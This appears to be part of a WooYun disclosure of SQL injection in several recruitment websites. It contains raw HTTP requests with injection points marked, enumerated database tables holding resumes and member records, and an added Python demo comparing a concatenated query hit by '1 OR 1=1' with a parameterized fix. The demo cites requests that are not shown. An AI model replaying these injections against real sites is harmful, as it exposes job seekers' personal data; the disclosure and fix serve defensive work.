| dbo.RC_RECEIVEDINFO | 61609 |
| dbo.ZP_DWINFO_ls | 56401 |
| dbo.MEMBER_EXP | 28255 |
| dbo.CRM_FEE_OVER | 27612 |
| dbo.V_DFJH_CB21 | 24953 |
| dbo.rc_letter | 18203 |
| dbo.RC_JOBBOOKING | 13209 |
http://**.**.**.**/company/prodetail.php?id=29325&company_id=63328
**.**.**.**/headhunter/?actionName=&keyWord=12*&mark=0
**.**.**.**/jobshow.php?id=1&x=21233
**.**.**.**/rencai/?City=&key=&Province=1*&sj=
**.**.**.**/zhaopin/?City=20*
**.**.**.**/zhaopin/?PB_page=4&Province=2*
Database: rencai001
+----------------+---------+
| Table | Entries |
+----------------+---------+
| kan_jl | 177284 |
| jl | 81439 |
| mianshi | 44395 |
| huiyuan_geren | 16548 |
| info_qiye | 6526 |
| shoucang | 3813 |

POST /user/regup.php HTTP/1.1
Host: **.**.**.**
Referer: http://**.**.**.**/
Content-Length: 288
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=kgqm6autfb1rb1oti19ks8gh36; lzrc_username=jxieqhjw; lzrc_job_userclass=1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
email=sample%40email.tst&go=1&password=g00dPa%24%24w0rD&password2=g00dPa%24%24w0rD&Submit=%cf%d6%d4%da%be%cd%b4%b4%bd%a8%ce%d2%b5%c4%d5%ca%bb%a7&username=*


Database: sjzpw
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| job_com_or_rc | 122619 |
| cdb_memberfields | 97707 |
| cdb_members | 97549 |
| job_myrc | 95754 |
| job_ku | 87293 |
| job_rczl | 63716 |
| job_zp | 58781 |
| job_gzjl | 15904 |
| job_message | 15795 |
| job_company | 10459 |

POST /zwsearchlist.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDCSSBQCBC=FMGGNLCADNHILAHEFGMEFJGE
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

imageField2=&p_class=com&p_hkadd=1&p_keys=1*&p_time=183&p_zlone=0000
Database: personadata0746job
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.psend_gruser | 202735 |
| dbo.person_onewedf | 53005 |
| dbo.csend_duedlj | 43586 |
| dbo.psave_dlkjfei | 30373 |
| dbo.csave_dsmyr | 30235 |
| dbo.czpzw_dwefew | 14845 |

POST /Jobs/login/loginCommit.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 145
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDQCTASCAD=OBBNKNNAGNEIFFFLGGCCJHDL; njrcpassword%5Frc=; njrcusername%5Frc=
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
button=%e7%99%bb%e5%bd%95&destpage=/jobs/MyFaceLetter/Letters.asp&fjm=1&password=111*&username=xlgeustu


Suggested fix:

Filter the input.
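The resumeID injection from the detailed description and the fix suggested here, as an added example that is not part of the original report: the lookup written once the way the report's behaviour implies (string concatenation) and once fixed, plus a log-side check that flags the request shapes shown above. It assumes sqlite3 as a stand-in for the SQL Server backend, a constructed resume table with fake values, and a hypothetical list of numeric parameters.

```python
"""Added example (not from the original report): vulnerable and fixed
resumeID lookups side by side, plus a request-shape check for detection.
sqlite3 stands in for the SQL Server backend named in the report."""
import re
import sqlite3

# Constructed sample rows standing in for a resume table; all values are fake.
SAMPLE_RESUMES = [
    (1, "Alice Example", "555-0101", "1 Example Street"),
    (2, "Bob Example", "555-0102", "2 Example Street"),
    (3, "Carol Example", "555-0103", "3 Example Street"),
]

# Parameters the report shows as numeric ids that were injectable
# (hypothetical list; extend it per application).
NUMERIC_PARAMS = ("resumeID", "id", "f1")
IPV4 = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE resume (resumeID INTEGER PRIMARY KEY, "
                 "name TEXT, phone TEXT, address TEXT)")
    conn.executemany("INSERT INTO resume VALUES (?, ?, ?, ?)", SAMPLE_RESUMES)
    return conn


def lookup_vulnerable(conn, resume_id: str):
    """The pattern the '*' marker in the report points at: the raw query-string
    value is pasted into the SQL text, so it can rewrite the WHERE clause."""
    sql = "SELECT resumeID, name, phone FROM resume WHERE resumeID = " + resume_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, resume_id: str):
    """Fixed form: reject anything that is not a plain integer, then bind the
    value as a parameter so the driver never interprets it as SQL."""
    if not re.fullmatch(r"[0-9]{1,10}", resume_id):
        raise ValueError("resumeID must be a positive integer")
    sql = "SELECT resumeID, name, phone FROM resume WHERE resumeID = ?"
    return conn.execute(sql, (int(resume_id),)).fetchall()


def suspicious_fields(params: dict, headers: dict) -> list:
    """Detection side: names of fields whose value does not fit its expected
    shape. Covers the numeric ids and X-Forwarded-For, which the adclick.asp
    request above shows used as an injection point (IPv4-only check here)."""
    bad = [p for p in NUMERIC_PARAMS
           if p in params and not re.fullmatch(r"[0-9]+", params[p])]
    xff = headers.get("X-Forwarded-For")
    if xff is not None and not all(IPV4.fullmatch(h.strip()) for h in xff.split(",")):
        bad.append("X-Forwarded-For")
    return bad


def run_demo() -> dict:
    """Run both lookups on the sample data and return the outcomes."""
    conn = make_db()
    out = {
        "vulnerable_normal": lookup_vulnerable(conn, "1"),
        "vulnerable_injected": lookup_vulnerable(conn, "1 OR 1=1"),  # every row
        "fixed_normal": lookup_parameterized(conn, "1"),
    }
    try:
        lookup_parameterized(conn, "1 OR 1=1")
        out["fixed_injected"] = "accepted"
    except ValueError:
        out["fixed_injected"] = "rejected"
    conn.close()
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
    # Values taken from the requests in the report above.
    print(suspicious_fields({"resumeID": "1*"}, {"X-Forwarded-For": "DDCIz8th*"}))
```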

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Rank: 13

Confirmed: 2015-09-25 17:02

Vendor reply:

CNVD has confirmed the reported situation. Some of the cases have been forwarded by CNCERT to its Guangdong branch center, which will coordinate handling with the organizations that operate the websites.

Latest status:

None yet

